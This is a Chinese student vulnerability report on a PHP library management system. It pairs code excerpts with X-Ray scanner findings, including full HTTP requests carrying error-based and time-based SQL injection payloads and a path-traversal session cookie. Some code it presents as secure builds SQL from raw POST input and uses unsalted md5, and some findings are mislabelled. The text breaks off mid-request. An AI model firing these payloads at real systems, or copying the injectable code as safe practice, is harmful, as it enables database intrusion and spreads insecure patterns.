漏洞检测报告
一、系统可能存在的漏洞及分析
1、页数合法性判断
在获取图书总数用于计算总页数时,首先要判断页数是否合法,如果记录数为0时,直接从第一页开始,避免offset计算错误。通过提前进行数值合法性来增强代码健壮性。
$bookModel = new BookModel;
$count = $bookModel->rowCount($where);
if($count != 0){
if($currentPage < 1){
$currentPage = 1;
}else if($currentPage > ceil($count/$eachPerPage)){
$currentPage = ceil($count/$eachPerPage);
}
}else{
$currentPage = 1;
}
2、检测验证信息是否完整
加入对于验证信息是否完整的判断语句,保证信息的完整性与正确性,保证账号的安全性。它可以有效防止某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,可以防止批量注册,人眼看起来都费劲,何况是机器。
if(in_array("",$bookInfo)){
$this->sendJsonMessage("请输入完整信息",1);
}
$bookModel = new BookModel;
if($bookModel->insert($bookInfo)){
$this->sendJsonMessage("添加成功",0);
}else{
$this->sendJsonMessage("添加失败",1);
}
}
3、计算应还书的时间以及判断续借操作的合法性
计算图书应当归还的时间,判断读者是否超出应还时间,超出归还时间的图书不可以进行续借操作。
if(strtotime($result['back_date']) < time()){
$this->sendJsonMessage("超期的书不能续借",1);
}
$backTime = date("Y-m-d",strtotime("+1 month",strtotime($result['back_date'])));
$data = array("back_date"=>$backTime);
if($borrowModel->update($data,"book_id={$bookId} AND user_id={$userId}")){
$this->sendJsonMessage("续借成功",0);
}else{
$this->sendJsonMessage("续借失败",1);
}
}
4、未传参中断
如果未传参数,则进行中断操作。
if(!isset($_POST['bookId']) || !isset($_POST['userId'])){
$this->sendJsonMessage("缺少参数",1);
}
$bookId = $_POST['bookId'];
$userId = $_POST['userId'];
$borrowModel = new BorrowModel;
$result = $borrowModel->fetchOne("book_id={$bookId} AND user_id={$userId}");
5、没有借书就不能续借
首先判断该用户是否借阅此书,如果没有借阅则无法进行借阅操作。反之,则在为超期的前提下可以进行续借操作。
if(empty($result)){
$this->sendJsonMessage("该用户没有借阅此书",1);
}
6、还书操作合法性判断
增加对于是否可以还书的判断语句,如果信息错误或该用户未借此书,则无法还书。
public function returnBook(){
$this->accessJson();
$bookId = $_POST['bookId'];
$userId = $_POST['userId'];
$borrowModel = new BorrowModel;
if($borrowModel->canReturn($bookId,$userId)){
if($borrowModel->delete("book_id={$bookId} AND user_id={$userId}")){
$this->sendJsonMessage("还书成功",0);
}else{
$this->sendJsonMessage("还书失败",1);
}
}else{
$this->sendJsonMessage("信息错误或该用户未借此书",1);
}
}
}
7、获取用户信息,阻止url非法传参,并且显示用户不存在
$userInfo = $userModel->fetchOne("id={$id}");
if(empty($userInfo)){
echo "<script>alert('该用户不存在');</script>";
die();
}
$borrowModel = new BorrowModel;
8、添加用户接口
加入了判断ID是否已经存在,以防ID重复。
public function insert(){
$this->accessJson();
$user['id'] = $_POST['userId'];
$user['pwd'] = md5($_POST['password']);
$user['name'] = $_POST['name'];
$user['class'] = $_POST['class'];
$user['status'] = $_POST['status'] ? 1 : 0;
$usermodel = new UserModel;
if(in_array("",$user)){
$this->sendJsonMessage("请将信息填写完整",1);
}
if($usermodel->rowCount("id={$user['id']}")){
$this->sendJsonMessage("该用户ID已存在",1);
}
if($usermodel->insert($user)){
$this->sendJsonMessage("添加用户成功",0);
}else{
$this->sendJsonMessage("添加用户失败",1);
}
}
9、删除操作
在删除前,再一次向用户提出是否确认删除,以防误删。
$(".delete").click(function(){
if(confirm("真的要删除吗?")){
$.post({
url: "?p=Admin&c=Book&a=delete",
data: {"id":$(this).attr("bookId")},
success:function(data){
alert(data.message);
location.reload();
}
});
}
})
});
10、验证页面权限
通过if判断语句来辨别页面权限的合法性,增强代码的健壮性以及系统权限的安全性。
protected function accessPage(){
if(isset($_SESSION['userId'])){
if($_SESSION['admin'] == 1 && P == "Admin");
else if($_SESSION['admin'] == 0 && P == "Home");
else{
$p = $_SESSION['admin'] ? "Admin" : "Home";
header("location:?p={$p}&c=Index&a=index");
die();
}
}else{
header("location:?p=Common&c=Login&a=index");
die();
}
}
11、验证接口权限
通过if判断语句来辨别操作权限的合法性,增强代码的健壮性以及系统权限的安全性。
protected function accessJson(){
header("Content-Type:application/json");
if(isset($_SESSION['userId'])){
if($_SESSION['admin'] == 1 && P == "Admin");
else if($_SESSION['admin'] == 0 && P == "Home");
else{
$this->sendJsonMessage("操作权限不足",1);
}
}else{
$this->sendJsonMessage("未登陆",1);
}
}
12、检测用户是否登陆,有则导向对应的主页
在页面跳转前,先检测用户是否登录,如果已经登录,则跳转到对应的主页。反之,则提示请先登录,然后跳转到登录界面。
private function checkLogin(){
if(isset($_SESSION['userId'])){
$p = $_SESSION['admin'] ? "Admin" : "Home";
header("location:?p={$p}&c=Index&a=index");
die();
}
}
public function index(){
$this->checkLogin();
$this->smarty->display("login.html");
}
public function showVerify(){
new Verify;
}
13、先验证验证码的正确性,验证正确之后,再验证账号密码,以此来减小数据库压力
$userModel = new UserModel;
$where = "id='{$userId}' and pwd='{$password}'";
$result = $userModel->fetchOne($where);
if(!empty($result) && $result['status'] == 1){
$_SESSION['userId'] = $userId;
$_SESSION['admin'] = $result['admin'];
$_SESSION['last_login_time'] = $result['last_login_time'];
$message = array("message"=>"OK","code"=>0,"admin"=>"{$result['admin']}");
14、更新最后登陆时间
更新时间前先判断账号是否挂失,若挂失则提醒用户联系管理员解决。
$time = date('Y-m-d H:i:s');
$userModel->update(array("last_login_time"=>$time),$where);
}else if(!empty($result) && $result['status'] == 0){
$message = array("message"=>"该账户已挂失,请联系管理员解决","code"=>1);
}else{
$message = array("message"=>"账号或密码错误","code"=>1);
15、登陆
登录时先判断验证码的正确性,判断验证码的正确性首先判断验证码的位数是否合法。
$("#submit").click(function(){
if($("[name='userId']").val().length == 0 || $("[name='password']").val().length == 0){
alert("请输入账号或密码!");
return false;
}else if($("[name='verify']").val().length != 4){
alert("验证码必须为4位!");
return false;
}
$.post({
url:"?p=Common&c=Login&a=login",
data:$("#form").serialize(),
success:function(data){
if(data.code == 0 && data.admin == 1){
16、挂失接口
挂失成功后销毁session,使登陆失效
public function lost(){
$this->accessJson();
$id = $_SESSION['userId'];
$userModel = new UserModel;
if($userModel->update(array("status"=>0),"id={$id}")){
$_SESSION = array();
session_destroy();
$this->sendJsonMessage("挂失成功",0);
}else{
$this->sendJsonMessage("挂失失败",1);
} }
17、修改密码接口
public function changePwd(){
$this->accessJson();
$originPwd = md5($_POST['originPwd']);
$newPwd = md5($_POST['newPwd']);
$confrimPwd = md5($_POST['confirmPwd']);
18、在修改密码是,要确认密码二次验证,防止非法提交
if($newPwd != $confrimPwd){
$this->sendJsonMessage("两次输入的密码不一致",1);
}
$userModel = new UserModel;
if($userModel->rowCount("id={$_SESSION['userId']} and pwd='{$originPwd}'")){
if($userModel->update(array("pwd"=>$newPwd),"id={$_SESSION['userId']} and pwd='{$originPwd}'")){
19、更改密码后销毁当前session
$_SESSION = array();
session_destroy();
$this->sendJsonMessage("密码修改成功",0);
}else{
$this->sendJsonMessage("密码修改失败",1);
}
}else{
$this->sendJsonMessage("原密码错误",1);
}
}
}
20、在修改密码时,两次输入的密码不一致时,做出提示
$("#pwdSubmit").click(function(){
if($("[name='originPwd']").val().length == 0 || $("[name='newPwd']").val().length == 0 || $("[name='confirmPwd']").val().length == 0){
alert("请将信息填写完整");
return false;
}
if($("[name='newPwd']").val() != $("[name='confirmPwd']").val()){
alert("两次输入的密码不一致");
return false;
}
$.post({
url:"?p=Home&c=User&a=changePwd",
data:$("#form").serialize(),
success:function(data){
alert(data.message);
if(data.code == 0){
location.reload();
}
}
});
});
21、阻止克隆对象
private function __clone(){}
22、阻止new对象
private function __construct(){
$this->db_host = $GLOBALS['conf']['db_host'];
$this->db_user = $GLOBALS['conf']['db_user'];
$this->db_pwd = $GLOBALS['conf']['db_pwd'];
$this->db_name = $GLOBALS['conf']['db_name'];
$this->db_port = $GLOBALS['conf']['db_port'];
$this->charset = $GLOBALS['conf']['charset'];
$this->connect();
$this->setCharSet();
}
private function connect(){
@$this->mysqli = new \mysqli($this->db_host,$this->db_user,$this->db_pwd,$this->db_name,$this->db_port);
if($this->mysqli->connect_errno != 0){
echo "<h2>MySql连接错误!</h2>";
echo "错误信息:".$this->mysqli->connect_error;
die();
}
}
private function setCharSet(){
$this->mysqli->set_charset($this->charset);
}
23、判断sql语句是否出错
private function isErr(){
if($this->mysqli->errno != 0){
echo "<h2>Sql语句错误</h2>";
echo "错误信息:".$this->mysqli->error;
die();
}
}
24、关于上一页操作
在第一页时上一页失效,不在第一页时则保持常规操作。
private function firstInit(){
if($this->currentPage == 1){
$disable = "class='disabled'";
$tag = "span";
$link = "";
}else{
$disable = "";
$tag = "a";
$link = "href='{$this->pre}'";
}
$this->pageStr ="<nav class='text-center'>
<ul class='pagination'>
<li {$disable}>
<{$tag} {$link} aria-label='Previous'>
<span aria-hidden='true'>«</span>
</{$tag}>
</li>";
}
25、中间页码部分,当页数小于5时,页码列表开始为1。同时也会存在正常情况,左边越界以及右边越界情况
private function middleInit(){
if($this->pageNum <= 5){
$start = 1;
$end = $this->pageNum;
}else if($this->currentPage - 2 < 1){
$start = 1;
$end = 5;
}else if($this->currentPage + 2 > $this->pageNum){
$start = $this->pageNum - 4;
$end = $this->pageNum;
}else{
//正常情况
$start = $this->currentPage - 2;
$end = $this->currentPage + 2;
}
26、关于下一页的操作
在最后一页时下一页失效,不在最后一页时则保持常规操作。
private function lastInit(){
if($this->currentPage == $this->pageNum){
$disable = "class='disabled'";
$tag = "span";
$link = "";
}else{
$disable = "";
$tag = "a";
$link = "href='{$this->next}'";
}
$this->pageStr .= "<li {$disable}>
<{$tag} {$link} aria-label='Next'>
<span aria-hidden='true'>»</span>
</{$tag}>
</li>
</ul>
</nav>";
}
}
27、确认验证码分配颜色
$color = imagecolorallocate($this->picRes, rand(50, 150), rand(50, 150), rand(50, 150));
28、身份验证漏洞:如果系统的身份验证机制不够安全,攻击者可能会利用弱密码、会话劫持或者跨站脚本等方式绕过身份验证,进入系统并执行恶意操作。
措施1:实施强密码策略:要求用户使用复杂的密码,并定期更新密码。同时,使用加密算法对密码进行存储和传输。
29、数据库注入漏洞:如果系统没有对用户输入的数据进行充分的验证和过滤,攻击者可能会通过恶意构造的输入数据来执行恶意数据库查询,从而获取敏感信息或者修改数据库内容。
措施1:对用户输入进行严格验证和过滤:确保用户输入的数据符合预期的格式和内容,可以使用输入验证库或者正则表达式来实现。
措施2:使用参数化查询或ORM框架:通过使用参数化查询或者对象关系映射(ORM)框架,可以有效防止数据库注入攻击。
30、跨站脚本漏洞:如果系统没有对用户输入的数据进行适当的转义和过滤,攻击者可能会在网页中注入恶意脚本,从而盗取用户的敏感信息或者进行其他恶意操作。
措施1:输入验证和过滤:对用户输入的数据进行严格的验证和过滤,确保只接受预期的数据格式和内容。可以使用输入验证库或正则表达式来实现。
措施2: 输出转义:在将用户输入的数据输出到网页上时,确保对特殊字符进行适当的转义,以防止恶意脚本的执行。可以使用安全的输出函数或HTML编码库来实现。
措施3:安全的编程实践:遵循安全的编程实践,包括不信任用户输入、不直接拼接动态生成的HTML代码等,以减少XSS漏洞的风险。
措施4:持续更新和修补:及时更新系统和应用程序框架,以获取最新的安全补丁和修复程序,以防止已知的XSS漏洞。
措施5:安全培训和意识提高:为开发人员提供安全培训,提高他们对XSS漏洞和其他安全问题的认识,并确保他们采取适当的安全措施。
31、不安全的文件上传功能:如果系统允许用户上传文件,并且没有对上传的文件进行适当的验证和限制,攻击者可能会上传恶意文件,从而执行任意代码或者获取系统权限。
措施1:实施安全的文件上传功能:限制上传文件的类型和大小,并在服务器端对上传的文件进行严格的验证和检查。最好将上传的文件存储在非Web可访问的目录中。
32、定期更新系统和框架:及时应用安全补丁,更新系统和框架,以确保系统不受已知漏洞的影响。
二、使用X·RAY从系统中检测出的漏洞以及其解决办法
1、文件包含漏洞
URL: http://library/readme.md
Payload: /readme.md
Request1:
GET /readme.md HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/79.0
Content-Length: 67
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-7
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
2、文件包含漏洞
URL: http://library/README.md
Payload: /README.md
Request1:
GET /README.md HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
3、文件包含漏洞
URL: http://library/LICENSE
Payload: /LICENSE
Request1:
GET /LICENSE HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Range: bytes=0-8096
Referer: http://library/
X-Requested-With: XMLHttpRequest
password=123456&userId=123456789&verify=pv5D
4、文件包含漏洞
URL: http://library/server-status
Payload: /server-status
Request1:
GET /server-status HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 44
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
password=123456&userId=123456789&verify=pv5D
文件包含漏洞的原理:
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码并执行,从而节省时间避免再次编写,这种调用文件的过程被称为包含。但是如果开发人员没有对包含的文件来源进行严格的审查,导致包含了其它恶意文件,执行了非预期的代码,就会引发文件包含漏洞。
PHP中引发文件包含漏洞的函数有以下四种:
(1)require()
(2)require_once()
(3)include()
(4)include_once()
reuqire() 如果在包含的过程中有错,比如文件不存在等,会直接退出,不执行后续语句。
include() 如果出错的话,只会提出警告,会继续执行后续语句。
require_once() 和 include_once() 与前两个的不同之处在于这两个函数只包含一次,如果一个文件已经被包含过了,则不会再包含它,以避免函数重定义或变量重赋值等问题。
文件包含漏洞修复措施:
1.建议白名单
2.指定访问一定的路径,再将参数拼接到路径当中
3、PHP 中使用 open_basedir 配置限制访问在指定的区域
4、过滤.(点)/(反斜杠)\(反斜杠)等特殊字符
5、尽量关闭 allow_url_include 配置
5、基线检测漏洞
URL: http://library/
Request1:
GET / HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=../../../../public/858425652.php
Origin: http://library
Referer: http://library/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Response1:
HTTP/1.1 200 OK
Content-Type: text/html;charset:UTF-8;charset=UTF-8
Date: Sat, 3 Jun 2023 17:21:56 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
<br />
<b>Warning</b>: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>D:\phpstudy_pro\WWW\Library\Base\Base.class.php</b> on line <b>15</b><br />
<br />
<b>Warning</b>: session_start(): Failed to read session data: files (path: D:\phpstudy_pro\Extensions\tmp\tmp) in <b>D:\phpstudy_pro\WWW\Library\Base\Base.class.php</b> on line <b>15</b><br />
<!DOCTYPE html>
<html lang="zh-CN" style="height: 100%;">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>无锡学院图书馆管理系统</title>
<!--jquery-->
<script src="./Resources/jquery.min.js"></script>
<!-- 最新版本的 Bootstrap 核心 CSS 文件 -->
<link rel="stylesheet" href="./Resources/bootstrap.min.css">
<!-- 最新的 Bootstrap 核心 JavaScript 文件 -->
<script src="./Resources/bootstrap.min.js"></script>
</head>
<body style="background-image: url(./Resources/index.jpg);background-size:100% 100%;">
<div class="container" style="padding:200px 0px">
<div class="login" style="width:300px;height:280px;margin:0 auto;padding: 1px 40px;background-color: rgba(255, 255, 255, 0.55);border-radius:20px;display: none;">
<h2 class="text-center">无锡学院图书馆管理系统</h2>
<form id="form" style="margin-top:20px;">
<div class="form-group">
<div class="input-group" style="width:100%">
<input type="text" class="form-control" name="userId" placeholder="请输入账号">
</div>
</div>
<div class="form-group">
<div class="input-group" style="width:100%">
<input type="password" class="form-control" name="password" placeholder="请输入密码">
</div>
</div>
<div class="form-group form-inline">
<div class="input-group" style="width:155px">
<input type="text" class="form-control" name="verify" placeholder="请输入验证码">
</div>
<div class="input-group">
<img src="?p=Common&c=Login&a=showVerify" id="verifyPic" style="width:60px;height:34px;border-radius:4px;">
</div>
</div>
<button type="button" class="form-control btn btn-primary" id="submit">登录</button>
</form>
</div>
</div>
</body>
<script>
$(function(){
$(".login").fadeIn(800);
//注册点击更换验证码事件
$("#verifyPic").click(function(){
$(this).attr('src',"?p=Common&c=Login&a=showVerify&" + Math.random());
});
//注册回车登陆事件
$("[name='verify']").keydown(function(event){
if(event.keyCode == 13){
$("#submit").click();
}
});
//登陆
$("#submit").click(function(){
if($("[name='userId']").val().length == 0 || $("[name='password']").val().length == 0){
alert("请输入账号或密码!");
return false;
}else if($("[name='verify']").val().length != 4){
alert("验证码必须为4位!");
return false;
}
$.post({
url:"?p=Common&c=Login&a=login",
data:$("#form").serialize(),
success:function(data){
if(data.code == 0 && data.admin == 1){
//管理员登陆
location.href = "?p=Admin&c=Index&a=index";
}else if(data.code == 0 && data.admin == 0){
//普通用户登陆
location.href = "?p=Home&c=Index&a=index";
}else{
alert(data.message);
$("#verifyPic").click();
$("[name='verify']").val("");
}
}
});
})
});
</script>
</html>
基线检测漏洞修复方案:打补丁
6、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: deadline
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 4
Accept-Encoding: gzip
7、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: KeyWord
Payload: 5'and(select*from(select+sleep(2))a/**/union/**/select+1)='
Request1:
GET
/?a=index&c=Book&keyword=5%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
8、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:name
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1172919984)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281172919984%29%29%29and%27&press=123456&pressTime=6-3&price=12
9、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:author
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1875407941)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281875407941%29%29%29and%27&desc=123456&name=123456&press=123456&pressTime=2001-6-4&price=12
10、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:press
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1173951946)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281173951946%29%29%29and%27&pressTime=2001-6-4&price=12
11、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:pressTime
Payload: /**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
12、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:State
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
13、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:Publication
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1173979346)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0Content-Length: 185
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281173951946%29%29%29and%27&pressTime=&price=12
14、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:price
Payload: 12'and/**/extractvalue(1,concat(char(126),md5(1299868396)))and'
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=2001-64&price=12%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281299868396%29%29%29and%27
15、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:ISBN
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1123453171)))and'
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281123453171%29%29%29and%27&author=123456&desc=123456&name=123456&press=123456&pressTime=price=12
16、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:desc
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1750467231)))and'
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281750467231%29%29%29and%27&name=123456&press=123456&pressTime=&price=12
17、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:price
Payload: 12'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
